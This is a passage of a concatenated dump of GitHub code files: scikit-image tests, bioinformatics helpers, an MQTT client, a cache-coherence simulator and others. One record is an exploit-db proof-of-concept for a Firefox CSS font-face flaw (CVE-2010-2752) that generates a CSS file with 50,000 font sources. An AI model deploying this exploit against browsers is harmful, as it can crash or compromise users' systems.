(_verify_range,\n \"From %s to %s\" % (np.dtype(dtype), np.dtype(dt)),\n y, omin, omax, np.dtype(dt))\n\n\ndef test_range_extra_dtypes():\n \"\"\"Test code paths that are not skipped by `test_range`\"\"\"\n\n # Add non-standard data types that are allowed by the `convert` function.\n dtype_range_extra = dtype_range.copy()\n dtype_range_extra.update({np.int32: (-2147483648, 2147483647),\n np.uint32: (0, 4294967295)})\n\n dtype_pairs = [(np.uint8, np.uint32),\n (np.int8, np.uint32),\n (np.int8, np.int32),\n (np.int32, np.int8),\n (np.float64, np.float32),\n (np.int32, np.float32)]\n\n for dtype_in, dt in dtype_pairs:\n imin, imax = dtype_range_extra[dtype_in]\n x = np.linspace(imin, imax, 10).astype(dtype_in)\n\n with expected_warnings(['precision loss|sign loss|\\A\\Z']):\n y = convert(x, dt)\n\n omin, omax = dtype_range_extra[dt]\n yield (_verify_range,\n \"From %s to %s\" % (np.dtype(dtype_in), np.dtype(dt)),\n y, omin, omax, np.dtype(dt))\n\n\ndef test_downcast():\n x = np.arange(10).astype(np.uint64)\n with expected_warnings('Downcasting'):\n y = img_as_int(x)\n assert np.allclose(y, x.astype(np.int16))\n assert y.dtype == np.int16, y.dtype\n\n\ndef test_float_out_of_range():\n too_high = np.array([2], dtype=np.float32)\n assert_raises(ValueError, img_as_int, too_high)\n too_low = np.array([-2], dtype=np.float32)\n assert_raises(ValueError, img_as_int, too_low)\n\n\ndef test_copy():\n x = np.array([1], dtype=np.float64)\n y = img_as_float(x)\n z = img_as_float(x, force_copy=True)\n\n assert y is x\n assert z is not x\n\n\ndef test_bool():\n img_ = np.zeros((10, 10), np.bool_)\n img8 = np.zeros((10, 10), np.bool8)\n img_[1, 1] = True\n img8[1, 1] = True\n for (func, dt) in [(img_as_int, np.int16),\n (img_as_float, np.float64),\n (img_as_uint, np.uint16),\n (img_as_ubyte, np.ubyte)]:\n converted_ = func(img_)\n assert np.sum(converted_) == dtype_range[dt][1]\n converted8 = func(img8)\n assert np.sum(converted8) == dtype_range[dt][1]\n\nif __name__ == '__main__':\n np.testing.run_module_suite()\n","repo_name":"jeetmehta/Lung-Cancer-Classification","sub_path":"syde-522-env/lib/python2.7/site-packages/skimage/util/tests/test_dtype.py","file_name":"test_dtype.py","file_ext":"py","file_size_in_byte":3567,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"37"} +{"seq_id":"11072008602","text":"def MinimumSkew(Genome):\n positions = [] # output variable\n skew = Skew(Genome)\n minimum = min(skew.values())\n for i in range(len(Genome)):\n if skew[i] == minimum:\n positions.append(i)\n return positions\n\n# Input: A String Genome\n# Output: SkewArray(Genome)\n# HINT: This code should be taken from the last Code Challenge.\ndef Skew(Genome):\n skew = {} #initializing the dictionary\n skew[0] = 0\n for i in range(len(Genome)):\n if Genome[i] == \"C\":\n skew[i + 1] = skew[i] -1\n elif Genome[i] == \"G\":\n skew[i +1] = skew[i] +1\n else:\n skew[i+1] = skew[i]\n # your code here\n return skew\n","repo_name":"mars1198/bioinformatics","sub_path":"MinimumSkew.py","file_name":"MinimumSkew.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31470130652","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n \n# Author: QuYingqi\n# mail: cookiequ17@hotmail.com\n# Created Time: 2017-11-08\nimport torch\nimport sys\nsys.path.append('../vocab')\nfrom seqMultiLabelLoader import SeqMultiLabelLoader\nimport numpy as np\n\n\nword_vocab = torch.load('../vocab/vocab.word.pt')\ntype_vocab = torch.load('../vocab/vocab.type.pt')\nseqs, labels = torch.load('data/train.subject_type.pt')\n'''\nprint(seqs[0])\nindex_question = np.transpose(seqs[0].numpy())\nprint(index_question)\n\nfor i in range(10):\n question_array = np.array(word_vocab.convert_to_word(index_question[i]))\n print(' '.join(question_array))\n'''\nloader = SeqMultiLabelLoader('data/test.subject_type.pt', 0)\nfor i,batch in enumerate(loader.next_batch(False)):\n if i > 1:break\n seq, label = batch\n question = np.transpose(seq.data.cpu().numpy())\n label = label.data.cpu().numpy()\n for i in range(10):\n array = np.array(word_vocab.convert_to_word(question[i]))\n print(' '.join(array))\n print(type_vocab.convert_to_word(np.where(label[i])[0]))\n","repo_name":"feiyutalk/kbqa_FB","sub_path":"subject_type/tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73951564266","text":"import k2\nimport torch\nfrom conformer import Conformer\nfrom decoder import Decoder\nfrom joiner import Joiner\nfrom model import Transducer\n\n\ndef test_transducer():\n # encoder params\n input_dim = 10\n output_dim = 20\n\n # decoder params\n vocab_size = 3\n blank_id = 0\n embedding_dim = 128\n num_layers = 2\n\n encoder = Conformer(\n num_features=input_dim,\n output_dim=output_dim,\n subsampling_factor=4,\n d_model=512,\n nhead=8,\n dim_feedforward=2048,\n num_encoder_layers=12,\n )\n\n decoder = Decoder(\n vocab_size=vocab_size,\n embedding_dim=embedding_dim,\n blank_id=blank_id,\n num_layers=num_layers,\n hidden_dim=output_dim,\n output_dim=output_dim,\n embedding_dropout=0.0,\n rnn_dropout=0.0,\n )\n\n joiner = Joiner(output_dim, vocab_size)\n transducer = Transducer(encoder=encoder, decoder=decoder, joiner=joiner)\n\n y = k2.RaggedTensor([[1, 2, 1], [1, 1, 1, 2, 1]])\n N = y.dim0\n T = 50\n\n x = torch.rand(N, T, input_dim)\n x_lens = torch.randint(low=30, high=T, size=(N,), dtype=torch.int32)\n x_lens[0] = T\n\n loss = transducer(x, x_lens, y)\n print(loss)\n\n\ndef main():\n test_transducer()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"k2-fsa/icefall","sub_path":"egs/librispeech/ASR/transducer/test_transducer.py","file_name":"test_transducer.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":640,"dataset":"github-code","pt":"37"} +{"seq_id":"3855303596","text":"import paho.mqtt.client as mqtt\nimport json\nimport time\n\nclass MQTTConnection:\n\n\tdef __init__(self, broker_address, port, topic_alert, topic_auto, topic_rsu, rsu_id):\n\t\tself.broker = broker_address\n\t\tself.port = port\n\t\tself.topic_alert = topic_alert\n\t\tself.topic_auto = topic_auto\n\t\tself.topic_rsu = topic_rsu\n\t\tself.rsu_id = rsu_id\n\t\tself.client = mqtt.Client(rsu_id)\n\t\tself.client.on_connect = self.on_connect\n\t\tself.client.on_message = self.on_message\n\t\tself.client.connect(broker_address, port)\n\t\tself.client.loop_start()\n\n\tdef on_connect(self, client, userdata, flags, rc):\n\t\tprint(\" Connesso al broker MQTT: \")\n\t\tclient.subscribe(self.topic_alert + \"/\" + self.rsu_id + '/#')\n\n\tdef on_message(self, client, userdata, message):\n\t\tif message.topic.startswith(\"/alert\"):\n\t\t\tpayload = json.loads(message.payload)\n\t\t\tif payload[\"creator_id\"] == self.rsu_id:\n\t\t\t\tpass \n\t\t\telse:\n\t\t\t\tcreator = payload[\"creator_id\"]\n\t\t\t\tt_arrival = time.time()*1000 \n\t\t\t\tt_trasm = payload[\"t_creation\"]*1000\n\t\t\t\tt_total_ms = round(t_arrival - t_trasm)\n\t\t\t\tprint(\" da\", creator, \" - Tempo impiegato:\", t_total_ms , \" ms\")\n\t\t\t\tpayload[\"t_travel\"]= t_total_ms\n\t\t\t\tself.manage_alert(payload)\n\t\t\t\n\t\t\t#print(\" Ricevuto Alert\")\n\t\t\t#payload = json.loads(message.payload)\n\t\t\t#print(payload)\n\t\t\t#self.manage_alert(payload)\n\t\t\t# alert_id = payload[\"id\"]\n\t\t\t# alert[alert_id] = payload\n\n\tdef handle_message(self, topic, message):\n\t\tif message.topic.startswith(\"/smartcar\"):\n\t\t\tpayload = json.loads(message.payload)\n\t\t\tvehicle_id = payload[\"id\"] \n\t\t\tif payload[\"rsu_id\"] == self.rsu_id:\n\t\t\t\tveicoli_connessi[vehicle_plate] = payload\n\n\tdef send_vehicle_status(self,vehicle_info):\n\t\tvehicle_info_json = json.dumps(vehicle_info)\n\t\tself.client.publish(self.topic_auto + \"/info\", vehicle_info_json)\n\n\tdef send_alert(self, alert):\n\t\talert_json = json.dumps(alert)\n\t\ttype = alert.get(\"type\", \"undefined\")\n\t\tself.client.publish(self.topic_alert + \"/\" + self.rsu_id + \"/\" + type, alert_json)\n\n\tdef manage_alert(self, payload):\n\t\tif self.on_alert_callback:\n\t\t\tself.on_alert_callback(payload)","repo_name":"mariocarbone/tesi","sub_path":"rsu/mqtt_lib.py","file_name":"mqtt_lib.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40136610856","text":"class Car:\r\n name = \"\"\r\n brands = \"\"\r\n price = None\r\n company = \"\"\r\n\r\n def __init__(self, name, brands, price, owenerCom):\r\n self.name = name\r\n self.brands = brands\r\n self.price = price\r\n self.company = owenerCom\r\n\r\n def buy(self):\r\n print(f\"\\nYou have brought {self.brands} from the company {self.company}\")\r\n print(f\"\\t\\tYou have successfully paid {self.price}$ for {self.name}\")\r\n print(f\"\\t\\tThank You. \")\r\n\r\n\r\ncar1 = Car('BMW-12','BMW',20500,\"Volsk Weagon\")\r\ncar1.buy()\r\n\r\ncar1 = Car('Audi-1A','Audi',16800,\"Audi\")\r\ncar1.buy()\r\n\r\n","repo_name":"NurulIslam17/PYTHON","sub_path":"OOP/constructor.py","file_name":"constructor.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9639596475","text":"import cbf\nimport recsys\nimport util\nimport presentation\nimport json\n\nsfw_games = \"../resources/sfw_games.json\"\nmost_popular_games_steam = \"../resources/most_popular_games_steam.json\"\ntags = \"../resources/relevant_tags.json\"\n\nICM_append, URM, liked_tags, disliked_tags = recsys.get_k_most_popular_tags(tags, 12, 28)\nICM, ICM_link = recsys.setup_ICM(sfw_games, ICM_append)\n\n\nuserID_to_index, itemID_to_index, featureID_to_index = recsys.create_mappings(ICM, URM)\nrecsys.apply_mappings(ICM, URM, userID_to_index, itemID_to_index, featureID_to_index)\n\nICM_all, URM_all = recsys.convert_to_sparse(ICM, URM, userID_to_index, itemID_to_index, featureID_to_index)\n\nrecommender = cbf.Recommender(URM_all, ICM_all, ICM_link, itemID_to_index)\nrecommender.fit(shrink=10, topK=50)\n\ngames = recommender.recommend(0)\nrecommendations = []\npresentation = presentation.Presentation(ICM, liked_tags, disliked_tags, itemID_to_index, featureID_to_index)\n\npresentation.present_result(games, ICM_link)\n#\"\"\"","repo_name":"Zatfer17/II2202_Research_Methodology_And_Scientific_Writing","sub_path":"code/interview.py","file_name":"interview.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74440747251","text":"from datetime import timedelta\nimport hashtable\n\n\n# The Manifest holds onto all the information of the packages that\n# will be loaded on the trucks once they are sorted and routed\nclass Manifest:\n def __init__(self, manifest_id):\n self.manifest_id = manifest_id\n self.packages = list()\n self.truck = 0\n self.driver = 0\n self.is_full = False\n self.route = list()\n self.packages_by_location = hashtable.HashTable()\n\n # Used to print package information when using various messages\n def __str__(self):\n return '\\n'.join(str(package) for package in self.packages)\n\n # Used for debugging purposes\n def __repr__(self):\n return '\\n'.join(str(package) for package in self.route)\n\n # O(n)\n # When adding multiple packages to the manifest\n def add_packages(self, packages):\n for package in packages:\n self.add_package(package)\n\n # O(n)\n # Adding a package to the manifest\n def add_package(self, package):\n if package not in self.packages:\n if package.delivery_status == 'At Hub':\n if package.delay != timedelta(hours=8) or package.wrong_address == 'W':\n package.delivery_status = 'Delayed'\n else:\n # maybe change name\n package.delivery_status = 'Loading'\n self.packages.append(package)\n elif package.delivery_status == 'Loading':\n print('{}, already loading...'.format(repr(package)))\n if self.packages_by_location.get(package.location) is None:\n self.packages_by_location.put(package.location, list())\n self.packages_by_location.get(package.location).append(package)\n if len(self.packages) == 16:\n self.is_full = True\n else:\n print('Error adding: ' + str(package) + ', already on Manifest')\n\n # Remove a package from the manifest\n def remove_package(self, package):\n if package in self.packages:\n package.delivery_status = 'At Hub'\n self.packages.remove(package)\n self.packages_by_location.remove(package.location, package)\n if len(self.packages) == 16:\n self.is_full = False\n else:\n print('Error removing: ' + str(package) + ', not on Manifest')\n\n\n# The Driver holds onto the time to handle when they would leave an depart from the warehouse or 'Hub'\nclass Driver:\n def __init__(self, driver_id):\n self.driver_id = driver_id\n self.time = timedelta(hours=8)\n\n\n# The Manifest List handles all the sorting and routing of each manifest\nclass ManifestList:\n\n def __init__(self, num_manifests, warehouse, hub):\n self.num_manifests = num_manifests\n self.manifests = list()\n self.hub = hub\n self.warehouse = warehouse\n\n # O(n)\n # Adds all packages to manifests from each territory\n # Looks at each manifest to see if it over capacity\n # Removes those packages\n # After manifest are at capacity or 'full', loads remaining packages on to new manifests\n # While adding packages to manifest both the truck and deliver with constraint are handled\n def sort(self, territories):\n print('Sorting packages...')\n num_territories = len(territories)\n # print('Amount of Manifests: ' + str(self.num_manifests))\n for m in range(self.num_manifests):\n manifest = Manifest(m)\n if m < num_territories:\n self.add_packages_to_manifest_from_territory(territories[m], manifest)\n else:\n self.move_non_constraint_packages_to_other_manifest(manifest)\n self.manifests.append(manifest)\n # print(' Manifest {0}:'.format(manifest.manifest_id))\n # print(str(manifest))\n self.assign_truck_ids()\n\n # O(n)\n # Assigns truck id's to manifest without them\n def assign_truck_ids(self):\n truck_id_list = ['1', '2', '3']\n for manifest in self.manifests:\n if manifest.truck is 0:\n manifest.truck = truck_id_list[0]\n truck_id_list.pop(0)\n else:\n truck_id_list.remove(manifest.truck)\n\n # O(n^2)\n # Add package to manifest from territory\n def add_packages_to_manifest_from_territory(self, territory, manifest):\n for location in territory:\n packages = self.warehouse.packages_by_location.get(location)\n for package in packages:\n # Handle Truck constraint\n if package.delivery_status == 'At Hub':\n if manifest.truck == 0 and package.truck != '':\n manifest.truck = package.truck\n manifest.add_packages(self.warehouse.packages_by_truck.get(package.truck))\n # Handle Deliver With constraint\n elif len(package.deliver_with) > 0:\n manifest.add_packages(self.warehouse.get_packages_deliver_together(package.deliver_with))\n # Handle package without constraint\n else:\n manifest.add_package(package)\n\n # O(n^2)\n # Remove packages from manifest over the set truck capacity and add to a new manifest\n def move_non_constraint_packages_to_other_manifest(self, manifest):\n for t_manifest in self.manifests:\n if t_manifest.is_full:\n packages = self.get_non_constraint_packages(t_manifest)\n for package in packages:\n manifest.add_package(package)\n\n # O(n^2)\n # Removes packages from an over capacity manifest and adds them to a list\n def get_non_constraint_packages(self, manifest):\n removed_packages = list()\n furthest_locations_from_hub = reversed(self.hub.get_neighbors())\n for package in manifest.packages:\n if manifest.is_full:\n if package.wrong_address is not '':\n removed_packages.append(package)\n manifest.remove_package(package)\n else:\n break\n for neighbor in furthest_locations_from_hub:\n if manifest.is_full:\n packages_at_location = manifest.packages_by_location.get(neighbor.location)\n if packages_at_location is not None:\n for package in packages_at_location:\n if not package.has_constraint():\n removed_packages.append(package)\n manifest.remove_package(package)\n return removed_packages\n\n # O(n^2)\n # Routes the manifests packages and places them on a new list\n # Looks at three different situations\n # 1) If a package is delayed, 2) has a deadline, or\n # 3) is the closest to the current location\n # It then then look at each candidate to decide where to go to first\n # Once an optimal candidate id chosen it is added to the route\n def route(self):\n print('Routing packages...')\n drivers = [Driver(1), Driver(2)]\n for manifest in self.manifests:\n driver = drivers[0]\n if drivers[0].time > drivers[1].time:\n driver = drivers[1]\n time = driver.time\n # print('Driver is driver {}'.format(driver.driver_id))\n manifest.driver = driver.driver_id\n current_location = self.hub\n # print(' Manifest {0}:'.format(manifest.manifest_id))\n while len(manifest.route) < len(manifest.packages):\n # 'wrong address' scenario\n if time >= timedelta(hours=10, minutes=40):\n package = self.warehouse.packages_by_id.get(9)\n package.delivery_status = 'Loaded'\n package.location = self.warehouse.g.get_location('410 S State St')\n\n delayed = self.find_soonest_delayed_time(current_location, manifest)\n closest = self.find_closest_from_package(current_location, manifest)\n soonest = self.find_soonest_delivery_time(current_location, manifest)\n\n package_delivery = self.schedule_best_package(delayed, soonest, closest, time, current_location,\n manifest)\n\n current_location = package_delivery.package.location\n time = package_delivery.package.estimated_delivery_time\n to_hub = package_delivery.package.location.neighbors_by_location.get(self.hub)\n time = time + timedelta(hours=to_hub.distance/18)\n driver.time = time\n # Switch drivers\n drivers.append(driver)\n if drivers[0]:\n drivers.pop(0)\n elif drivers[1]:\n driver.pop(1)\n\n # O(n^2)\n # Looks for the package with the soonest deadline and returns it as a candidate\n def find_soonest_delivery_time(self, starting_point, manifest):\n neighbors = starting_point.get_neighbors()\n soonest_hours_to = timedelta(hours=23.99)\n soonest_package = None\n soonest = timedelta(hours=17)\n soonest_miles = 0\n for neighbor in neighbors:\n packages = manifest.packages_by_location.get(neighbor.location)\n if packages is not None:\n for package in packages:\n if package not in manifest.route:\n if package.deadline < soonest:\n soonest_package = package\n soonest_hours_to = neighbor.get_hours_to()\n soonest = package.deadline\n soonest_miles = neighbor.distance\n return PackageDelivery(soonest_package, soonest_hours_to, soonest_miles)\n\n # O(n^2)\n # Looks for the package that is the closest to the current location and returns it as a candidate\n def find_closest_from_package(self, current_location, manifest):\n current_location_packages = manifest.packages_by_location.get(current_location)\n if current_location_packages is not None:\n for package in current_location_packages:\n if package not in manifest.route and package.delivery_status is not 'Delayed' and package in manifest.packages:\n return PackageDelivery(package, timedelta(hours=0), 0)\n closest_locations_to_package = current_location.get_neighbors()\n for neighbor in closest_locations_to_package:\n for pac in manifest.packages:\n if pac not in manifest.route and pac.location is neighbor.location:\n if pac.delivery_status is not 'Delayed':\n return PackageDelivery(pac, neighbor.get_hours_to(), neighbor.distance)\n else:\n continue\n\n # O(n^2)\n # Looks for a package that is delayed and returns it as a candidate\n def find_soonest_delayed_time(self, starting_point, manifest):\n neighbors = starting_point.get_neighbors()\n delayed_hours_to = timedelta(hours=23.99)\n delayed_package = None\n delayed = timedelta(hours=17)\n delayed_miles = 0\n for neighbor in neighbors:\n packages = manifest.packages_by_location.get(neighbor.location)\n if packages is not None:\n for package in packages:\n if package not in manifest.route:\n if package.delay < delayed and package.delay != timedelta(\n hours=8) and package.delivery_status is 'Delayed':\n delayed_package = package\n delayed_hours_to = neighbor.get_hours_to()\n delayed = package.delay\n delayed_miles = neighbor.distance\n return PackageDelivery(delayed_package, delayed_hours_to, delayed_miles)\n\n # O(1) + O(n) + 0(1)\n # Choose which candidate will be delivered by first checking oif the deadline will be met\n # second, if the package has a delay, and third if the the other 2 criteria are not met it will\n # choose the closest package\n def schedule_best_package(self, delayed, soonest, closest, time, current_location, manifest):\n if soonest.package is not None and closest is not None and soonest.package is not closest.package:\n more_time = self.find_time_between(closest.package.location, soonest.package.location)\n total_time = time + closest.hours_to + more_time\n if total_time > soonest.package.deadline:\n return self.schedule_package_delivery(soonest, time, timedelta(0), manifest, 'Soonest')\n if delayed.package is not None and closest is not None:\n time_back = self.find_time_between(self.hub, delayed.package.location)\n if time + closest.hours_to > delayed.package.delay:\n time_to_hub = self.find_time_between(current_location, self.hub)\n for package in manifest.packages:\n if package.delivery_status is 'Delayed' and package.delay == delayed.package.delay:\n package.delivery_status = 'Loaded'\n return self.schedule_package_delivery(delayed, time, time_to_hub + time_back, manifest, 'Delayed')\n if closest is not None and closest.package is not None:\n return self.schedule_package_delivery(closest, time, timedelta(0), manifest, 'Closest')\n\n # O(1)\n # Schedules the package, giving it a delivery time\n def schedule_package_delivery(self, package_delivery, time, additional_time, manifest, type):\n package_delivery.type = type\n manifest.route.append(package_delivery.package)\n package_delivery.package.estimated_delivery_time = time + additional_time + package_delivery.hours_to\n package_delivery.package.hours_to = package_delivery.hours_to + additional_time\n package_delivery.package.miles_to = float(package_delivery.package.hours_to.seconds / 60) / 60 * 18\n # print(' Added {}'.format(repr(package_delivery)))\n return package_delivery\n\n # O(n)\n # Finds the time it take to travel between locations\n def find_time_between(self, other_location, soonest_location):\n if other_location is soonest_location:\n return timedelta(hours=0)\n neighbors = other_location.get_neighbors()\n for neighbor in neighbors:\n if neighbor.location is soonest_location:\n return neighbor.get_hours_to()\n\n\n# The Package Delivery acts as a candidate for a package to be delivered.\nclass PackageDelivery:\n def __init__(self, package, hours_to, miles_to):\n self.package = package\n self.hours_to = hours_to\n self.miles_to = miles_to\n self.type = ''\n\n def __repr__(self):\n return ' Type {}, {}, Hours to {}'.format(self.type, repr(self.package), self.hours_to)\n","repo_name":"branlewalk/wgu-c950","sub_path":"manifest.py","file_name":"manifest.py","file_ext":"py","file_size_in_byte":14976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32570926498","text":"'''\n __ __ ____ _ _ ____\n | \\/ |/ __ \\ /\\ | | | | _ \\\n | \\ / | | | | / \\ | | | | |_) |\n | |\\/| | | | |/ /\\ \\| | | | _ <\n | | | | |__| / ____ \\ |__| | |_) |\n |_| |_|\\____/_/ \\_\\____/|____/\n\n http://www.exploit-db.com/moabu-15-mozilla-firefox-css-font-face-remote-code-execution-vulnerability/\n https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15104.zip (moaub-25-exploit.zip)\n\n'''\n\n'''\n Title : Mozilla Firefox CSS font-face Remote Code Execution Vulnerability\n Version : Firefox\n Analysis : http://www.abysssec.com\n Vendor : http://www.mozilla.com\n Impact : Crirical\n Contact : shahin [at] abysssec.com , info [at] abysssec.com\n Twitter : @abysssec\n CVE : CVE-2010-2752\n\n'''\n\nimport sys;\n\nmyStyle = \"\"\"\n @font-face {\n font-family: Sean;\n font-style: normal;\n font-weight: normal;\n src: url(SEAN1.eot);\n src: url('type/filename.woff') format('woff')\n\n\"\"\"\ni=0\nwhile(i<50000):\n myStyle = myStyle + \",url('type/filename.otf') format('opentype')\\n\";\n i=i+1\n\nmyStyle = myStyle + \",url('type/filename.otf') format('opentype');\\n\";\nmyStyle = myStyle + \"}\\n\";\ncssFile = open(\"style2.css\",\"w\")\ncssFile.write(myStyle)\ncssFile.close()","repo_name":"ryanmrestivo/red-team","sub_path":"_Resources/Exploit DB 2021-12-11/exploits/windows/dos/15104.py","file_name":"15104.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"} +{"seq_id":"42502091850","text":"###########################\n# Cache Coherence Simulator\n# Author: Adam McCarthy\n###########################\nimport pickle\nimport sys\n\nfrom argparse import ArgumentParser, RawTextHelpFormatter\n\nfrom tqdm import tqdm\n\nfrom cache import Bus\nfrom cache.protocols.msi import MSICache\nfrom cache.protocols.mesi import MESICache\nfrom cache.protocols.mes import MESCache\nfrom utils import int_or_None, parse_line\n\n\ndef record_stats(stats, caches):\n \"\"\"\n Records the stats for each cache\n \"\"\"\n for cache in caches:\n stats[cache.__class__.__name__][cache.block_size] = cache.stats\n\nif __name__ == \"__main__\":\n parser = ArgumentParser(description=\"Cache Coherence Simulator.\", formatter_class=RawTextHelpFormatter)\n parser.add_argument(\"--noprogress\", dest=\"noprogress\", action=\"store_true\", help=\"hide the progress bar (required if printing stats)\")\n parser.add_argument(\"filename\", metavar=\"filename\", type=str, nargs=1, help=\"the trace file to process\")\n parser.add_argument(\"--msi\", dest=\"msi\", action=\"store_const\", const=MSICache, default=None, help=\"simulate the MSI protocol\")\n parser.add_argument(\"--mesi\", dest=\"mesi\", action=\"store_const\", const=MESICache, default=None, help=\"simulate the MESI protocol\")\n parser.add_argument(\"--mes\", dest=\"mes\", action=\"store_const\", const=MESCache, default=None, help=\"simulate the MES protocol\")\n parser.add_argument(\"--record\", dest=\"record\", action=\"store_true\", help=\"record statistics to a file\")\n\n args = parser.parse_args()\n caches = (args.msi, args.mesi, args.mes)\n caches = [c for c in caches if c is not None]\n if len(caches) == 0:\n sys.stderr.write(\"Please choose at least one cache.\\n\")\n sys.exit(1)\n\n with open(args.filename[0], \"r\") as f:\n trace_lines = f.readlines()\n\n block_sizes = (2, 4, 8, 16)\n stats = {}\n for cache in caches:\n if args.record:\n stats[cache.__name__] = {}\n\n for block_size in block_sizes:\n # Create an atomic bus with 4 caches\n bus = Bus(cache, 4, block_size=block_size)\n\n print(\"Processing trace with %s at block size %d...\" % (cache.__name__, block_size))\n if not args.noprogress:\n # Create a progressbar\n pbar = tqdm(total=len(trace_lines), leave=True)\n\n for line in trace_lines:\n # convert \"P0 R 2 into (0, \"R\", 2)\n line = parse_line(line)\n if not args.noprogress:\n pbar.update(1)\n\n if line: # ignore comments (which are None)\n bus.process_transaction(*line)\n\n if not args.noprogress:\n pbar.close()\n\n if args.record:\n record_stats(stats, bus.caches)\n\n if args.record:\n with open(\"stats-block_size.pkl\", \"wb\") as f:\n pickle.dump(stats, f)\n","repo_name":"mccajm/cache_coherence_simulator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"534662022","text":"#entrada\ne = 0\nvh = 10\nvhe = 20\nc = input('Código de usuário: ')\nn = float(input('Horas trabalhadas na semana: '))\n#processamento\nif n > 50 :\n e = n - 50\n n = n - e\n \nextra = e * vhe\nsalario = n * vh\ntotal = extra + salario\n\n#saida\nprint(f'Salário: R$ {salario:.2f}')\nprint(f'Extra: R$ {extra:.2f}')\nprint(f'Total a receber na semana: R$ {total:.2f}')\n","repo_name":"lggmello/algorithms_programming","sub_path":"ProgramasPython/secao6/Exercicio06.py","file_name":"Exercicio06.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"446266013","text":"import json\nimport requests\nfrom typing import List\n\nfrom unity_sds_client.unity_session import UnitySession\nfrom unity_sds_client.resources.process import Process\nfrom unity_sds_client.resources.job import Job, JobStatus\nfrom unity_sds_client.utils.http import get_headers\n\nclass ProcessService(object):\n \"\"\"\n The ProcessService class is a wrapper to Unity's Science Processing Service endpoints.\n \"\"\"\n\n def __init__(\n self,\n session:UnitySession,\n endpoint:str = None\n ):\n \"\"\"\n Initialize the ProcessService class.\n\n Parameters\n ----------\n session : UnitySession\n The Unity Session that will be used to facilitate making calls to the SPS endpoints.\n endpoint : str\n An endpoint URL to override the endpoint specified in the package's config.\n\n Returns\n -------\n ProcessService\n The Process Service object.\n \"\"\"\n self._session = session\n if endpoint is None:\n self.endpoint = self._session.get_service_endpoint(\"sps\", \"sps_endpoint\")\n\n def get_processes(self) -> List[Process]:\n \"\"\"\n Returns a list of processes already deployed within SPS\n \"\"\"\n\n token = self._session.get_auth().get_token()\n headers = get_headers(token)\n url = self.endpoint + \"processes\"\n response = requests.get(url, headers=headers)\n response.raise_for_status()\n processes = []\n for process in response.json()['processes']:\n processes.append(\n Process(\n self._session,\n self.endpoint,\n process['id'],\n process['title'],\n process['abstract'],\n process['executionUnit'],\n process['immediateDeployment'],\n process['jobControlOptions'],\n process['keywords'],\n process['outputTransmission'],\n process['owsContextURL'],\n process['processVersion']\n )\n )\n\n return processes\n \n \n def get_process(self, process_id:str) -> Process:\n \"\"\"\n Returns a list of processes already deployed within SPS\n \"\"\"\n\n token = self._session.get_auth().get_token()\n headers = get_headers(token)\n url = self.endpoint + \"processes/{}\".format(process_id)\n response = requests.get(url, headers=headers)\n response.raise_for_status()\n process_json = response.json()['process']\n process = Process(\n self._session,\n self.endpoint,\n process_json['id'],\n process_json['title'],\n process_json['abstract'],\n process_json['executionUnit'],\n process_json['immediateDeployment'],\n process_json['jobControlOptions'],\n process_json['keywords'],\n process_json['outputTransmission'],\n process_json['owsContextURL'],\n process_json['processVersion']\n )\n\n return process\n \n \n def get_jobs(self, process:Process):\n \n token = self._session.get_auth().get_token()\n headers = get_headers(token)\n job_url = self.endpoint + \"processes/{}/jobs\".format(process.id)\n response = requests.get(job_url, headers=headers)\n response.raise_for_status()\n\n jobs = []\n for item in response.json()['jobs']:\n jobs.append(\n Job(\n self._session,\n self.endpoint,\n process,\n item['jobID'],\n JobStatus(item['status']),\n item['inputs']\n )\n )\n\n return jobs\n \n def deploy_process(self, data):\n\n token = self._session.get_auth().get_token()\n headers = get_headers(token, {\n 'Content-type': 'application/json'\n })\n url = self.endpoint + \"processes\"\n response = requests.post(url, headers=headers, json=json.dumps(data))\n response.raise_for_status()\n\n return response","repo_name":"unity-sds/unity-py","sub_path":"unity_sds_client/services/process_service.py","file_name":"process_service.py","file_ext":"py","file_size_in_byte":4205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42573500506","text":"'''\n Faça um programa que leia um ano qualquer e mostre se ele é bissexto.\n'''\n\nimport datetime\nfrom calendar import isleap\n\nano = int(input('Que ano quer analisar? Coloque 0 para analisar o ano atual: '))\ndata = datetime.date.today()\nano_atual = data.year\n\nif ano == 0:\n ano = ano_atual\nif isleap(ano):\n print('O ano {} é \\33[36mBISSEXTO\\33[m!'.format(ano))\nelse:\n print('O ano {} não é \\33[31mBISSEXTO\\33[m!'.format(ano))\n\n# Expressao para saber se é bissexto\n# ano % 4 == 0 and ano % 100 != 0 or ano % 400 == 0","repo_name":"wallanmota/Exercicios_cursoemvideo_python","sub_path":"32.py","file_name":"32.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4956204437","text":"#got the function definition in statement idea from Dr.Lusth and Kaleb\n# also Kaleb gave me the 